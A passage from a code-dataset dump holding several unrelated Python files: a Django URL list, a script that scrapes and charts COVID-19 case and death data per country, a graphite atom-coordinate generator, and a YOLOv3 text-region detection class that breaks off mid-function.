url(r'^request_map_search_info_ajax/$', ajax_func.get_map_search_info, name=\"request_map_search_info\"),\n # url(r'^date_del_ajax/$', ajax_func.delete_by_date, name=\"date_by_date\"),\n]","sub_path":"warehouse_viewer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"419105780","text":"from requests import get\nimport requests\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\nimport itertools\nimport pandas as pd\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import datetime, timedelta\n\n#\n# functions to access web sites to scrape and confirm the web site is good\n#\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None.\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\ndef log_error(e):\n \"\"\"\n It is always a good idea to log errors. 
\n    This function just prints them, but you can\n    make it do anything.\n    \"\"\"\n    print(e)\n\n#\n# since data is updated around 11:30pm Eastern, find yesterday's date after midnight to get the latest update\n# and update the url to scrape with yesterday's date\n#\ndate_yesterday = datetime.strftime(datetime.now() - timedelta(1), '%m-%d-%Y')\nurl_date_yesterday = 'https://github.com/CSSEGISandData/COVID-19/blob/master/csse_covid_19_data/csse_covid_19_daily_reports/' + str(date_yesterday) + '.csv'\n\n#\n# scrape country, deaths, confirmed cases from CSSE Johns Hopkins University (JHU)\n#\ncountries_unique = pd.DataFrame()\njhu_raw_html = simple_get(url_date_yesterday)\njhu_soup = BeautifulSoup(jhu_raw_html, 'lxml')\njhu_table = jhu_soup.find_all('table')[0]\njhu_df = pd.read_html(str(jhu_table))[0]\ncountries_unique['jhu'] = jhu_df['Country_Region'].unique()\n\n#\n# sum confirmed cases, deaths columns per country from JHU\n#\ncountry_records_sum = pd.DataFrame()\ncountry_totals = pd.DataFrame()\nfor country in countries_unique['jhu']:\n    country_records = jhu_df.loc[jhu_df['Country_Region'] == country, ['Country_Region', 'Confirmed', 'Deaths']]\n    country_records_sum.at[0, 'Country'] = country\n    country_records_sum.at[0, 'Confirmed'] = (country_records['Confirmed']).sum()\n    country_records_sum.at[0, 'Deaths'] = (country_records['Deaths']).sum()\n    country_records_sum.at[0, \"Population\"] = ''\n    country_totals = country_totals.append(country_records_sum, ignore_index=True)\n\n#\n# scrape population by country data from Worldometers (WoM)\n#\nwom_pop_html = simple_get('https://www.worldometers.info/world-population/population-by-country')\nwom_pop_countries_unique = pd.DataFrame()\nwom_pop_soup = BeautifulSoup(wom_pop_html, 'lxml')\nwom_pop_table = wom_pop_soup.find_all('table')[0]\nwom_pop_df = pd.read_html(str(wom_pop_table))[0]\nwom_pop_countries_unique['wom_pop'] = wom_pop_df['Country (or dependency)'].unique()\ncountries_unique = pd.concat([countries_unique, wom_pop_countries_unique], axis=1)\ncountries_unique.to_excel(\"CountriesUnique.xlsx\")\n\n#\n# list of countries that are common to both JHU and WoM\n#\ncommon = list(set(countries_unique['jhu']) & set(countries_unique['wom_pop']))\n\n#\n# add countries from JHU to common that are not in WoM\n#\ncommon.append('US')\ncommon.append('Taiwan*')\ncommon.append('Cote d\\'Ivoire')\ncommon.append('Czechia')\ncommon.append('Korea, South')\n#common.append('Saint Kitts and Nevis')\ncommon.append('Saint Vincent and the Grenadines')\n\n#\n# map country names from JHU to WoM so we can look up the population from WoM\n#\nfor country in common:\n    new_country = ''\n    if country == 'US':\n        new_country = 'United States'\n    elif country == 'Taiwan*':\n        new_country = 'Taiwan'\n    elif country == 'Cote d\\'Ivoire':\n        new_country = 'Côte d\\'Ivoire'\n    elif country == 'Czechia':\n        new_country = 'Czech Republic (Czechia)'\n    elif country == 'Korea, South':\n        new_country = 'South Korea'\n#    elif country == 'Saint Kitts and Nevis':\n#        new_country == 'Saint Kitts & Nevis'\n    elif country == 'Saint Vincent and the Grenadines':\n        new_country = 'St. 
Vincent & Grenadines'\n else:\n new_country = country\n\n#\n# add 'Population' column to country_totals dataframe\n#\n country_population = wom_pop_df.loc[wom_pop_df['Country (or dependency)'] == new_country, ['Country (or dependency)', 'Population (2020)']]\n this_population = country_population['Population (2020)']\n country_totals.loc[country_totals['Country'] == country, ['Population']] = int(this_population)\n\n#\n# remove countries for whom I couldn't get population data\n#\ncountry_totals['Population'].replace('', np.nan, inplace=True)\ncountry_totals.dropna(subset=['Population'], inplace=True)\n\n#\n# calculate per capita data and multiply times 100 to make it a percent\n#\ncountry_totals['Confirmed/Population'] = (country_totals['Confirmed']/country_totals['Population']) * 100\ncountry_totals['Deaths/Confirmed'] = (country_totals['Deaths'] /country_totals['Confirmed']) * 100\ncountry_totals.sort_values(by=['Confirmed'], inplace=True, ascending=False)\ncountry_totals.to_excel(\"CountryTotals.xlsx\")\n\n#\n# variable to define minimum number of confirmed cases when pulling countries to display\n#\ncase_limit = 2000\n\n#\n# create x, y bar chart for total confirmed cases per country\n#\ncountry_totals_list_confirmed = country_totals.loc[country_totals['Confirmed'] > case_limit]\ncountry_totals_list_confirmed.sort_values(by=['Confirmed'], inplace=True, ascending=False)\ncountry_totals_list_confirmed.to_excel(\"CountryTotalsList.xlsx\", sheet_name='SortedConfirmed')\ncountry_totals_list_confirmed.plot(kind='bar', x='Country', y='Confirmed')\nplt.title('Confirmed Corona Virus Cases per Country (2000 Cases or More)')\nplt.ylabel('# Confirmed Cases')\nplt.grid(axis='y')\n\n#\n# create x, y bar chart for total deaths per country\n#\ncountry_totals_list_deaths = country_totals.loc[country_totals['Confirmed'] > case_limit]\ncountry_totals_list_deaths.sort_values(by=['Deaths'], inplace=True, ascending=False)\ncountry_totals_list_deaths.to_excel(\"CountryTotalsDeaths.xlsx\", sheet_name='SortedDeaths')\ncountry_totals_list_deaths.plot(kind='bar', x='Country', y='Deaths')\nplt.title('Deaths Total per Country (for Countries with at least 2000 Confirmed Cases)')\nplt.ylabel('# of Deaths')\nplt.grid(axis='y')\n\n#\n# create x, y bar chart for % confirmed cases per capita by country\n#\ncountry_totals_list_confirmedpercent = country_totals.loc[country_totals['Confirmed'] > case_limit]\ncountry_totals_list_confirmedpercent.sort_values(by=['Confirmed/Population'], inplace=True, ascending=False)\ncountry_totals_list_confirmedpercent.to_excel(\"CountryTotalsListConfirmedPercent.xlsx\", sheet_name='ConfirmedPercent')\ncountry_totals_list_confirmedpercent.plot(kind='bar', x='Country', y='Confirmed/Population')\nplt.title('Confirmed Corona Virus Cases as a Fraction of Country Population (for Countries with at least 2000 Confirmed Cases)')\nplt.ylabel('(%) Confirmed Cases / Population')\nplt.grid(axis='y')\n\n#\n# create x, y bar chart for % deaths as fraction of confirmed cases per country\n#\ncountry_totals_list_deathspercent = country_totals.loc[country_totals['Confirmed'] > case_limit]\ncountry_totals_list_deathspercent.sort_values(by=['Deaths/Confirmed'], inplace=True, ascending=False)\ncountry_totals_list_deathspercent.to_excel(\"CountryTotalsListDeathsPercent.xlsx\", sheet_name='DeathsPercent')\ncountry_totals_list_deathspercent.plot(kind='bar', x='Country', y='Deaths/Confirmed')\nplt.title('Deaths from Corona Virus Cases as a Fraction of Confirmed Cases (for Countries with at least 2000 Confirmed 
Cases)')\nplt.ylabel('(%) Deaths / Confirmed Cases')\nplt.grid(axis='y')\n\n\n#\n# time series charts\n#\n\n#\n# scrape country, deaths, confirmed cases from CSEE Johns Hopkins University (JHU)\n#\ncountries_unique_ts_confirmed = pd.DataFrame()\njhu_ts_confirmed_raw_html = simple_get(\n 'https://github.com/CSSEGISandData/COVID-19/blob/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv')\njhu_ts_confirmed_soup = BeautifulSoup(jhu_ts_confirmed_raw_html, 'lxml')\njhu_ts_confirmed_table = jhu_ts_confirmed_soup.find_all('table')[0]\njhu_ts_confirmed_df = pd.read_html(str(jhu_ts_confirmed_table))[0]\ncountries_unique_ts_confirmed['jhu'] = jhu_ts_confirmed_df['Country/Region'].unique()\njhu_ts_confirmed_df.to_excel(\"JHUTimeSeriesConfirmed.xlsx\")\n\ncountries_unique_ts_deaths = pd.DataFrame()\njhu_ts_deaths_raw_html = simple_get(\n 'https://github.com/CSSEGISandData/COVID-19/blob/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv')\njhu_ts_deaths_soup = BeautifulSoup(jhu_ts_deaths_raw_html, 'lxml')\njhu_ts_deaths_table = jhu_ts_deaths_soup.find_all('table')[0]\njhu_ts_deaths_df = pd.read_html(str(jhu_ts_deaths_table))[0]\ncountries_unique_ts_deaths['jhu'] = jhu_ts_deaths_df['Country/Region'].unique()\njhu_ts_deaths_df.to_excel(\"JHUTimeSeriesDeaths.xlsx\")\n\njhu_ts_confirmed_diff_df = jhu_ts_confirmed_df\njhu_ts_confirmed_diff_columns = list(jhu_ts_confirmed_diff_df.columns.values)\ndel jhu_ts_confirmed_diff_columns[0:5]\n\n\n\n\n#\n# sum confirmed cases, deaths columns per country from JHU\n#\ncountry_records_ts_confirmed_sum = pd.DataFrame()\ncountry_totals_ts_confirmed = pd.DataFrame()\njhu_ts_confirmed_df_columns = list(jhu_ts_confirmed_df.columns.values)\ndel jhu_ts_confirmed_df_columns[0:5]\nfor country in countries_unique_ts_confirmed['jhu']:\n for column in jhu_ts_confirmed_df.columns[5:]:\n country_records_ts_confirmed = jhu_ts_confirmed_df.loc[jhu_ts_confirmed_df['Country/Region'] == country]\n country_records_ts_confirmed_sum.at[0, 'Country'] = str(country)\n country_records_ts_confirmed_sum.at[0, column] = country_records_ts_confirmed[column].sum()\n country_totals_ts_confirmed = country_totals_ts_confirmed.append(country_records_ts_confirmed_sum, ignore_index=True)\ncountry_totals_ts_confirmed.to_excel(\"CountryTotalsTSConfirmed.xlsx\")\ncountry_records_ts_confirmed = jhu_ts_confirmed_df.loc[jhu_ts_confirmed_df['Country/Region'] == country]\ncountry_totals_ts_confirmed.set_index('Country', inplace=True)\ndf_transpose = country_totals_ts_confirmed.transpose()\ndf_transpose.to_excel(\"Transposed.xlsx\")\n\n\ncountry_records_ts_deaths_sum = pd.DataFrame()\ncountry_totals_ts_deaths = pd.DataFrame()\njhu_ts_deaths_df_columns = list(jhu_ts_deaths_df.columns.values)\ndel jhu_ts_deaths_df_columns[0:5]\nfor country in countries_unique_ts_deaths['jhu']:\n for column in jhu_ts_deaths_df.columns[5:]:\n country_records_ts_deaths = jhu_ts_deaths_df.loc[jhu_ts_deaths_df['Country/Region'] == country]\n country_records_ts_deaths_sum.at[0, 'Country'] = str(country)\n country_records_ts_deaths_sum.at[0, column] = country_records_ts_deaths[column].sum()\n country_totals_ts_deaths = country_totals_ts_deaths.append(country_records_ts_deaths_sum, ignore_index=True)\ncountry_totals_ts_deaths.to_excel(\"CountryTotalsTSDeaths.xlsx\")\ncountry_records_ts_deaths = jhu_ts_deaths_df.loc[jhu_ts_deaths_df['Country/Region'] == country]\ncountry_totals_ts_deaths.set_index('Country', inplace=True)\ndf_transpose_deaths = 
country_totals_ts_deaths.transpose()\ndf_transpose_deaths.to_excel(\"TransposedDeaths.xlsx\")\n\n\nx_ticks = range(0, len(df_transpose_deaths) + 10)\nx_labels = df_transpose_deaths.index.values\nline_labels = pd.DataFrame(columns=['Country', 'x', 'y'])\ncountry_column = df_transpose_deaths.columns\nline_labels_temp = pd.DataFrame()\nfor country in country_column:\n line_labels_temp.at[0, 'Country'] = country\n line_labels_temp.at[0, 'y'] = int(df_transpose_deaths[country].max())\n line_labels = line_labels.append(line_labels_temp, ignore_index=True)\nline_labels['x'] = len(df_transpose_deaths)\n\n'''\ndeaths_world_plot = df_transpose_deaths.plot(kind='line', x=df_transpose_deaths.index, y=df_transpose_deaths.columns, xticks=x_ticks, legend=False)\nplt.xticks(rotation=90, fontsize='small')\nplt.title('Confirmed Corona Virus Deaths Around the World')\nplt.ylabel('# of Deaths')\ndeaths_world_plot.set_facecolor('#cceeff')\nplt.grid(linestyle=':', linewidth='0.5', color='gray')\nfor key, row in line_labels.iterrows():\n country = row['Country']\n x = row['x']\n y = row['y']\n print(country + ' - ' + str(x) + ' - ' + str(y))\n plt.annotate(country, (x, y), ha='left', va='center', fontsize=8)\n'''\n\ndf_transpose_min_deaths = pd.DataFrame()\nfor country in line_labels['Country']:\n df_transpose_deaths_temp = df_transpose_deaths.loc[df_transpose_deaths[country] > 0, [country]]\n if len(df_transpose_deaths_temp) > 0:\n df_transpose_deaths_temp.reset_index(inplace=True)\n print(df_transpose_deaths_temp)\n df_transpose_min_deaths = pd.concat([df_transpose_min_deaths, df_transpose_deaths_temp[country]], axis=1)\ndf_transpose_min_deaths.to_excel(\"MinDeaths.xlsx\")\n\nx_ticks = range(0, len(df_transpose_min_deaths) + 10)\nx_labels = df_transpose_min_deaths.index.values\nline_labels = pd.DataFrame(columns=['Country', 'x', 'y'])\ncountry_column = df_transpose_min_deaths.columns\nline_labels_temp = pd.DataFrame()\nfor country in country_column:\n line_labels_temp.at[0, 'Country'] = country\n line_labels_temp.at[0, 'y'] = int(df_transpose_min_deaths[country].max())\n line_labels = line_labels.append(line_labels_temp, ignore_index=True)\nline_labels['x'] = len(df_transpose_min_deaths)\n\ndeaths_world_time_zero_plot = df_transpose_min_deaths.plot(kind='line', x=df_transpose_min_deaths.index, y=df_transpose_min_deaths.columns, xticks=x_ticks, legend=False)\nplt.xticks(rotation=90, fontsize='small')\nplt.title('Confirmed Corona Virus Deaths Around the World - Days Elapsed Since Time 0 (0 Deaths)')\nplt.ylabel('# of Deaths Since Time Zero')\nplt.xlabel('# of Days Elapsed')\ndeaths_world_time_zero_plot.set_facecolor('#cceeff')\nplt.grid(linestyle=':', linewidth='0.5', color='gray')\nfor key, row in line_labels.iterrows():\n country = row['Country']\n x = row['x']\n y = row['y']\n print(country + ' - ' + str(x) + ' - ' + str(y))\n plt.annotate(country, (x, y), ha='left', va='center', fontsize=8)\n\n\n#\n# time series data line graphs for all countries (plan of record)\n#\nx_ticks = range(0, len(df_transpose) + 10)\nx_labels = df_transpose.index.values\nline_labels = pd.DataFrame(columns=['Country', 'x', 'y'])\ncountry_column = df_transpose.columns\nline_labels_temp = pd.DataFrame()\nfor country in country_column:\n line_labels_temp.at[0, 'Country'] = country\n line_labels_temp.at[0, 'y'] = int(df_transpose[country].max())\n line_labels = line_labels.append(line_labels_temp, ignore_index=True)\nline_labels['x'] = len(df_transpose)\nprint(line_labels)\n\ncases_world_plot = df_transpose.plot(kind='line', 
x=df_transpose.index, y=df_transpose.columns, xticks=x_ticks, legend=False)\nplt.xticks(rotation=90, fontsize='small')\nplt.title('Confirmed Corona Virus Cases Around the World')\nplt.ylabel('# of Confirmed Cases')\ncases_world_plot.set_facecolor('#cceeff')\nplt.grid(linestyle=':', linewidth='0.5', color='gray')\nfor key, row in line_labels.iterrows():\n country = row['Country']\n x = row['x']\n y = row['y']\n print(country + ' - ' + str(x) + ' - ' + str(y))\n plt.annotate(country, (x, y), ha='left', va='center', fontsize=8)\n\n#\n# time series data line graphs based on time 0 alignment for all countries with minimal # of cases (days since cases = xxx)\n#\ndf_transpose_min_cases = pd.DataFrame()\nfor country in line_labels['Country']:\n df_transpose_temp = df_transpose.loc[df_transpose[country] >= 1000, [\n country]]\n if len(df_transpose_temp) > 0:\n df_transpose_temp.reset_index(inplace=True)\n print(df_transpose_temp)\n df_transpose_min_cases = pd.concat([df_transpose_min_cases, df_transpose_temp[country]], axis=1)\ndf_transpose_min_cases.to_excel(\"MinCases.xlsx\")\n\nx_ticks = range(0, len(df_transpose_min_cases) + 10)\nx_labels = df_transpose_min_cases.index.values\nline_labels = pd.DataFrame(columns=['Country', 'x', 'y'])\ncountry_column = df_transpose_min_cases.columns\nline_labels_temp = pd.DataFrame()\nfor country in country_column:\n line_labels_temp.at[0, 'Country'] = country\n line_labels_temp.at[0, 'y'] = int(df_transpose_min_cases[country].max())\n line_labels = line_labels.append(line_labels_temp, ignore_index=True)\nline_labels['x'] = len(df_transpose_min_cases)\n\nline_labels.to_excel(\"LineLabels.xlsx\")\n\n\ncases_since_time_zero_plot = df_transpose_min_cases.plot(kind='line', x=df_transpose_min_cases.index, y=df_transpose_min_cases.columns, xticks=x_ticks, legend=False)\nplt.xticks(rotation=90, fontsize='small')\nplt.title('Confirmed Corona Virus Cases Around the World - Days Elapsed Since 1000 Cases')\nplt.ylabel('# of Confirmed Cases')\nplt.xlabel('# of Days Elapsed Since 1000 Cases')\ncases_since_time_zero_plot.set_facecolor('#cceeff')\nplt.grid(linestyle=':', linewidth='0.5', color='gray')\nfor key, row in line_labels.iterrows():\n country = row['Country']\n x = row['x']\n y = row['y']\n print(country + ' - ' + str(x) + ' - ' + str(y))\n plt.annotate(country, (x, y), ha='left', va='center', fontsize=8)\n\n\n#\n# Daily new confirmed cases\n#\ni = 1\ndiff_df_temp = pd.DataFrame()\ntotal_columns = len(country_totals_ts_confirmed.columns)\nprint('Total columns = ' + str(total_columns))\nthiscolname = country_totals_ts_confirmed.columns.values[total_columns - 1]\ncases_threshold = country_totals_ts_confirmed.loc[country_totals_ts_confirmed[thiscolname] >= 10000]\nprint(cases_threshold)\nfor index in range(cases_threshold.shape[1] - 1):\n colname = cases_threshold.columns[index + i]\n prevcolname = cases_threshold.columns[index + i - 1]\n diff_df_temp[colname] = cases_threshold[colname] - cases_threshold[prevcolname]\n diff_df_temp.to_excel(\"Difference.xlsx\")\n\ndiff_df = pd.DataFrame()\ndiff_df = diff_df_temp\n\ndiff_transpose_df = diff_df.transpose()\ndiff_transpose_df.to_excel(\"DifferenceTranspose.xlsx\")\n\nx_ticks = range(0, len(diff_transpose_df) + 10)\nx_labels = diff_transpose_df.index.values\nline_labels = pd.DataFrame(columns=['Country', 'x', 'y'])\ncountry_column = diff_transpose_df.columns\nline_labels_temp = pd.DataFrame()\nfor country in country_column:\n line_labels_temp.at[0, 'Country'] = country\n line_labels_temp.at[0, 'y'] = 
int(diff_transpose_df[country].iloc[-1])\n line_labels = line_labels.append(line_labels_temp, ignore_index=True)\nline_labels['x'] = len(diff_transpose_df)\n\ndaily_new_cases_plot = diff_transpose_df.plot(kind='line', x=diff_transpose_df.index, y=diff_transpose_df.columns, xticks=x_ticks, legend=False, title=\"Daily New Cases\")\nplt.xticks(rotation=90, fontsize='small')\nplt.title('Number of Daily New Confirmed Cases per Country (Countries with 10K or More Cases)')\nplt.ylabel('# of Daily New Confirmed Cases')\nplt.xlabel('Date')\n#plt.ylim(0, 50000)\ndaily_new_cases_plot.set_facecolor('#cceeff')\nplt.grid(linestyle=':', linewidth='0.5', color='gray')\n#plt.legend()\nfor key, row in line_labels.iterrows():\n country = row['Country']\n x = row['x']\n y = row['y']\n plt.annotate(country, (x, y), ha='left', va='center', fontsize=6)\n\n\n\nplt.show()\n\n","sub_path":"GlobalCoronaDailyInfections.py","file_name":"GlobalCoronaDailyInfections.py","file_ext":"py","file_size_in_byte":19358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"379426287","text":"from decimal import Decimal as dec\nimport numpy as np\nfrom math import radians as rad\n\n#Vectors definition\na = 2.4640\na1x = a*np.sin(rad(30))\na1y = a*np.cos(rad(30))\n\n# R_0 definition\n#atom 1\nrx = [2.456, 3.684]\nry = [-2.83594, -2.12696]\n\npositions = []\ncorddinates = []\n\nfor k in range(0,2,1):\n for n in range(0,5,1):\n for j in range(0,5,1):\n positions.append('%.7f' % dec( rx[k] + n*a1x + j*a1x ) ) # x cordinates\n positions.append('%.7f' % dec( ry[k] + n*a1y - j*a1y ) ) # y cordinates\n corddinates.append(positions.copy())\n positions.clear()\n\narquivo = open(\"grafite.xyz\",\"w\")\narquivo.write(\"{}\\n\\n\".format(len(corddinates)))\n\nfor t in range(0,3,1):\n for item in corddinates:\n arquivo.write('C\\t{0[0]}\\t{0[1]}\\t {1}.00000000\\n'.format(item,3*t))\n","sub_path":"ts.py","file_name":"ts.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"462546983","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/12/6 10:50\n# @Author : panzi\n# @Site : yolo模型预测\n# @File : yolo3_predict.py\n# @Software: PyCharm Community Edition\n\nimport colorsys\nimport os\nfrom timeit import default_timer as timer\nimport numpy as np\nfrom keras import backend as K\nfrom keras.models import load_model\nfrom keras.layers import Input\nfrom PIL import Image, ImageFont, ImageDraw\nfrom yolo3.model import yolo_eval, yolo_body, tiny_yolo_body\nfrom yolo3.utils import letterbox_image\nimport os\nfrom keras.utils import multi_gpu_model\nfrom keras.utils import plot_model\nimport cv2\nfrom PIL import Image\nfrom config import YOLO3Config as C\nimport tensorflow as tf\nfrom pub.Lkmeans import AGNES,box_dist,idokonw\nfrom pub.RedChannel import GetRedC\nimport ctpn_predict\n\nclass YOLO3:\n\n def __init__(self):\n\n if C.USE_GPU:\n # 如果使用GPU\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = C.gpu_id # 使用 GPU 0和1\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n K.set_session(sess)\n\n self.model_path = C.model_path\n self.anchors_path = C.anchors_path\n self.classes_path = C.classes_path\n self.score = C.score\n self.iou = C.iou\n self.model_image_size = C.input_shape\n\n self.class_names = self._get_class()\n self.anchors = self._get_anchors()\n self.sess = K.get_session()\n self.boxes, self.scores, self.classes = self.generate()\n self.colors = 
self.__get_colors(self.class_names)\n\n\n    def _get_class(self):\n        classes_path = os.path.expanduser(self.classes_path)\n        with open(classes_path) as f:\n            class_names = f.readlines()\n        class_names = [c.strip() for c in class_names]\n        return class_names\n\n    def _get_anchors(self):\n        anchors_path = os.path.expanduser(self.anchors_path)\n        with open(anchors_path) as f:\n            anchors = f.readline()\n        anchors = [float(x) for x in anchors.split(',')]\n        return np.array(anchors).reshape(-1, 2)\n\n\n    @staticmethod\n    def __get_colors(names):\n        # different boxes get different colors\n        hsv_tuples = [(float(x) / len(names), 1., 1.)\n                      for x in range(len(names))]  # distinct colors\n        colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n        colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))  # RGB\n        np.random.seed(10101)\n        np.random.shuffle(colors)\n        np.random.seed(None)\n\n        return colors\n\n    def generate(self):\n        model_path = os.path.expanduser(self.model_path)  # expand ~ in the path\n        assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'\n\n        num_anchors = len(self.anchors)  # number of anchors\n        num_classes = len(self.class_names)  # number of classes\n\n\n        self.yolo_model = yolo_body(Input(shape=(416, 416, 3)), 3, num_classes)\n        self.yolo_model.load_weights(model_path)  # load the model weights\n\n        print('{} model, {} anchors, and {} classes loaded.'.format(model_path, num_anchors, num_classes))\n\n        # filter the boxes according to the detection parameters\n        self.input_image_shape = K.placeholder(shape=(2,))\n        boxes, scores, classes = yolo_eval(\n            self.yolo_model.output, self.anchors, len(self.class_names),\n            self.input_image_shape, score_threshold=self.score, iou_threshold=self.iou)\n        return boxes, scores, classes\n\n\n    def predict(self,image,image_path=''):\n        '''\n        The actual prediction function\n        :param image:\n        :return:\n        '''\n        start = timer()  # start time\n        if self.model_image_size != (None, None):  # 416x416, 416=32*13; must be a multiple of 32 because the smallest scale downsamples by 32\n            assert self.model_image_size[0] % 32 == 0, 'Multiples of 32 required'\n            assert self.model_image_size[1] % 32 == 0, 'Multiples of 32 required'\n            boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size)))  # letterbox-pad the image\n        else:\n            new_image_size = (image.width - (image.width % 32), image.height - (image.height % 32))\n            boxed_image = letterbox_image(image, new_image_size)\n        image_data = np.array(boxed_image, dtype='float32')\n        print('detector size {}'.format(image_data.shape))\n        image_data /= 255. 
# scale to 0~1\n        image_data = np.expand_dims(image_data, 0)  # add a batch dimension (one extra dim)\n\n        # returns boxes, scores, classes; the input image is 0~1, 4-D; plus the original image size\n        out_boxes, out_scores, out_classes = self.sess.run(\n            [self.boxes, self.scores, self.classes],\n            feed_dict={\n                self.yolo_model.input: image_data,\n                self.input_image_shape: [image.size[1], image.size[0]],\n                K.learning_phase(): 0\n            })\n\n        result = []\n        for i, c in reversed(list(enumerate(out_classes))):\n            predicted_class = self.class_names[c]  # class\n            box = out_boxes[i]  # box\n            score = out_scores[i]  # confidence\n            label = '{} {:.2f}'.format(predicted_class, score)  # label\n            top, left, bottom, right = box\n            top = max(0, np.floor(top + 0.5).astype('int32'))\n            left = max(0, np.floor(left + 0.5).astype('int32'))\n            bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))\n            right = min(image.size[0], np.floor(right + 0.5).astype('int32'))\n            print(label, (left, top), (right, bottom))  # bounding box\n            result.append([c,predicted_class,score,[left, top, right, bottom]])\n        return (image_path,result)\n\n    def detect_image(self, image):\n        start = timer()  # start time\n\n        if self.model_image_size != (None, None):  # 416x416, 416=32*13; must be a multiple of 32 because the smallest scale downsamples by 32\n            assert self.model_image_size[0] % 32 == 0, 'Multiples of 32 required'\n            assert self.model_image_size[1] % 32 == 0, 'Multiples of 32 required'\n            boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size)))  # letterbox-pad the image\n        else:\n            new_image_size = (image.width - (image.width % 32), image.height - (image.height % 32))\n            boxed_image = letterbox_image(image, new_image_size)\n        image_data = np.array(boxed_image, dtype='float32')\n        print('detector size {}'.format(image_data.shape))\n        image_data /= 255.  # scale to 0~1\n        image_data = np.expand_dims(image_data, 0)  # add a batch dimension (one extra dim)\n\n        # returns boxes, scores, classes; the input image is 0~1, 4-D; plus the original image size\n        out_boxes, out_scores, out_classes = self.sess.run(\n            [self.boxes, self.scores, self.classes],\n            feed_dict={\n                self.yolo_model.input: image_data,\n                self.input_image_shape: [image.size[1], image.size[0]],\n                K.learning_phase(): 0\n            })\n\n        print('Found {} boxes for {}'.format(len(out_boxes), 'img'))  # detected boxes\n\n        font = ImageFont.truetype(font='font/FiraMono-Medium.otf',\n                                  size=np.floor(1e-2 * image.size[1] + 0.5).astype('int32'))  # font\n        thickness = (image.size[0] + image.size[1]) // 777  # line thickness\n        for i, c in reversed(list(enumerate(out_classes))):\n            predicted_class = self.class_names[c]  # class\n            box = out_boxes[i]  # box\n            score = out_scores[i]  # confidence\n\n            label = '{} {:.2f}'.format(predicted_class, score)  # label\n            draw = ImageDraw.Draw(image)  # drawing handle\n            label_size = draw.textsize(label, font)  # label text size\n\n            top, left, bottom, right = box\n            top = max(0, np.floor(top + 0.5).astype('int32'))\n            left = max(0, np.floor(left + 0.5).astype('int32'))\n            bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))\n            right = min(image.size[0], np.floor(right + 0.5).astype('int32'))\n            print(label, (left, top), (right, bottom))  # bounding box\n\n            if top - label_size[1] >= 0:  # label text position\n                text_origin = np.array([left, top - label_size[1]])\n            else:\n                text_origin = np.array([left, top + 1])\n\n            # My kingdom for a good redistributable image drawing library.\n            for i in range(thickness):  # draw the box\n                draw.rectangle(\n                    [left + i, top + i, right - i, bottom - i],\n                    outline=self.colors[c])\n            draw.rectangle(  # text background\n                [tuple(text_origin), tuple(text_origin + label_size)],\n                fill=self.colors[c])\n            draw.text(text_origin, label, fill=(0, 0, 0), font=font)  # label text\n            del draw\n\n        end = timer()\n        print(end - start)  # detection time\n        return image\n\n    def close_session(self):\n        
self.sess.close()\n\n\n\n'''\nPost-processing: cut the image into target regions around the key positions located by yolo\nSingle-linkage clustering\n'''\ndef after_process(image_path, result):\n\n    '''\n    result:\n        0 = {list} : [13, 'CreditCode_1', 0.9705741, [792, 748, 979, 814]]\n        1 = {list} : [8, 'Person_1', 0.99604374, [217, 1135, 577, 1192]]\n        2 = {list} : [3, 'Address_1', 0.99387616, [219, 1045, 586, 1104]]\n        3 = {list} : [2, 'Company_1', 0.9963999, [242, 862, 566, 923]]\n        4 = {list} : [0, 'BusinessLicense_1', 0.9928785, [350, 503, 1293, 700]]\n\n    output:\n        [result_1,CUT(4 coordinates)]\n    '''\n\n    basename = os.path.basename(image_path)\n    img = cv2.imread(image_path)\n    (h,w,c) = img.shape\n\n    need_box = []\n    for res in result:\n        if res[1].split('_')[0] != 'BusinessLicense':  # and res[1].split('_')[0] != 'CreditCode' :\n            need_box.append(res)\n\n    result = AGNES(need_box,box_dist,C.Kmeans_Class)\n    # row clustering result\n    # print(result)\n\n    after_process_result = []\n    for class_i in range(len(result)):\n        need_box = []\n        Cut_Long = False\n        for box_i in result[class_i]:\n            need_box.append(box_i[3])\n            if box_i[1].split('_')[0] == 'CreditCode':\n                Cut_Long = True\n        need_box_np = np.array(need_box)\n        print(need_box_np,need_box_np.shape)\n        min_left = need_box_np.min(axis=0)[0]\n        min_top = need_box_np.min(axis=0)[1]\n        max_right = need_box_np.max(axis=0)[2]\n        min_right = need_box_np.min(axis=0)[2]\n        max_down = need_box_np.max(axis=0)[3]\n        if Cut_Long:\n            # keep the title\n            cut_box = (min_top-C.Cut_Pixel,max_down+C.Cut_Pixel,min_left,w)  # (y_min,y_max,x_min,x_max)\n            cut_img = img[cut_box[0]:cut_box[1], cut_box[2]:cut_box[3]]\n            for box_update_i in result[class_i]:\n                # update the yolo boxes 